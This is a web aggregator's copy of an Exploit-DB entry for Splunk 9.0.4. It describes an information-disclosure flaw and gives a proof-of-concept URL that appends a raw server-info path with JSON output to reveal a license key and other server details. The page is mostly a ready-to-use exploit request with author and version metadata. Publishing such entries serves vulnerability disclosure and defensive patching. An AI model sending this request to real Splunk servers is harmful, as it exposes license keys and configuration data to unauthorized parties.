4
[webapps] Splunk 9.0.4 - Information Disclosure
source link: https://www.exploit-db.com/exploits/51792
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Splunk 9.0.4 - Information Disclosure
EDB-ID:
51792
EDB Verified:
# Exploit Title: Splunk 9.0.4 - Information Disclosure
# Date: 2023-09-18
# Exploit Author: Parsa rezaie khiabanloo
# Vendor Homepage: https://www.splunk.com/
# Version: 9.0.4
# Tested on: Windows OS
# Splunk through 9.0.4 allows information disclosure by appending
# /__raw/services/server/info/server-info?output_mode=json to a query,
# as demonstrated by discovering a license key and other information.
# PoC :
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK